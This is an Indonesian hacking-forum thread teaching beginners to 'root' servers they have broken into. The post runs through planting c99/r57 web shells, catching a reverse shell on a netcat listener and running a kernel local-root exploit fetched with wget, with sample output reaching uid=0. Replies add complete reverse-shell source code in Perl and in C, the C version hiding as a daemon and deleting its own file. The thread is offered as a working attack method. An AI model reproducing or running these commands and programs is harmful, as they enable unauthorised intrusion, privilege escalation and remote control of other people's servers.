Belajar Ngeroot

Assalamualaikum....

bagi yang sudah master silakan dilewatkan saja karena pembahasan kali ini khusus buat newbie seperti saya

karna banyak dari agan-agan disini yang ingin tau tujuan ngeroot dan bagaimana cara melakukan root, pertama yang harus kita pahami adalah Apa sih tujuannya harus “ngeroot” atau mendapatkan akses root? Karena akses level “root” merupakan akses level tertinggi dalam UNIX, so dengan kita mendapatkan “root” maka anda bisa melakukan hal yang lebih banyak di server target.
Okelah klo begitu yuk kita mulai, beginilah cara ngeroot.
Langkah untuk ngeroot adalah:

Sediakan server / pc untuk menjalankan Netcat
Sediakan target yang sudah kita dapat dari (RFI/SHELLUPLOAD/LFI/DSB) yang safemode (OFF)
Sedikan juga shell injection tools (c99, r57, dsb) yang didalamnya tersedia fasilitas untuk backconnect / gunakan perl backconnect tools
Sediakan Netcat (NC) untuk menerima connection dari backconnect
Sediakan local root exploit yang sesuai dengan kernel target

Oke, kita mulai beraksi

Asumsikan bahwa:

IPHOSTSERVER ANDA = 123.456.789.10

PORT SERVER NETCAT ANDA: 10000

Langkah pertama cara ngeroot:

Pastikan bahwa Netcat sudah terinstall & Anda sudah menjalankan Netcat pada Server Anda.

Commandnya sangat sederhana: netcat -n -l -v -p PORT
Contoh:

Code:

netcat -n -l -v -p 10000

zer03s@blackbuntu:~$ nc -n -l -v -p 10000
Listening on [any] 10000 …

Langkah kedua cara ngeroot:

Pastikan bahwa anda sudah melakukan upload c99 / r57 ke server dimana didalamnya terdapat fasilitas backconnect. Jadi kita tinggal masukkan IP server kita,

Jika anda menggunakan perl backconnect tools, anda cukup ketikkan perintah: perl backconnectortools.txt IPHOSTSEVERANDA PORT

Contoh:

perl backconnect.txt 123.456.789.10 10000

Langkah ketiga cara ngeroot:

Tunggulan sampai ada connection dari server target ke server anda, biasanya akan muncul pesan bahwa terdapat koneksi ke server anda dari target.

Contoh:

zer03s@blackbuntu:~$ nc -n -l -v -p 10000
Listening on [any] 10000 …
Connect to [195.13.10.210] from localhost [127.0.0.1] 10000
Linux www.target.com 2.6.16 #1 SMP Fri Jun 01 17:19:41 EST NEW 2007 i686 i686 i386 GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache)

Langkah ke-empat cara ngeroot:

Anda sudah terkoneksi ke target, disinilah anda harus pandai-pandai menggunakan command Unix. Anda bisa belajar lebih dahulu command” Unix server.

Apabila sudah terkoneksi, maka persiapkanlah LOCAL EXPLOIT UNTUK KERNEL SERVER, ada banyak tools untuk local disesuaikan dengan kebutuhan.

Karena kernel target adalah 2.6.16, maka kita akan menggunakan 2.6.16 -> raptor, raptor2, h0llyshit, prctl untuk exploitnya.

Informasi mengenai local exploit untuk masing” kernel bisa dicari google, kalau kata ulil gamal gunakan jari jemari anda untuk menemukannya :)

Oke kita lanjut, setelah itu kita wget file raptor, kita tempatkan di yang permissionnya bisa execute. Kita cari saja yang 777 (misal: /var/tmp).

Kemudian kita jalankan perintahnya: ./raptor

w00t: uid=0(root) gid=0(root) groups=0(root)

whoami

uid=0(root) gid=0(root) groups=0(root)

Buzz, selamat anda sudah mendapatkan root.

Klo sudah dapat, dibagi bagi ya.

linux ya oms

Masih ga ngerti Mas Bro.

ijin copas materi kk , makasih

kgk mudeng oms .. izin baaca2 aja ahk

wih sangar bahasanny

perl backconnect tools ...download dimana kk ( minta link donk)

ki copy paste ae nang notepad

backconnect.pl

Code:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

backconnect.c

Code:

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(int argc, char *argv[])
{
int fd;
struct sockaddr_in sin;
char rms[21]="rm -f ";
daemon(1,0);
sin.sin_family = AF_INET;
sin.sin_port = htons(atoi(argv[2]));
sin.sin_addr.s_addr = inet_addr(argv[1]);
bzero(argv[1],strlen(argv[1])+1+strlen(argv[2]));
fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ;
if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {
  perror("[-] connect()");
  exit(0);
}
strcat(rms, argv[0]);
system(rms); 
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl("/bin/sh","sh -i", NULL);
close(fd);
}

wach nich mata melotot,,,,
pala ampe

pl nya masuk kulkas,,, makasih om

nubie
tp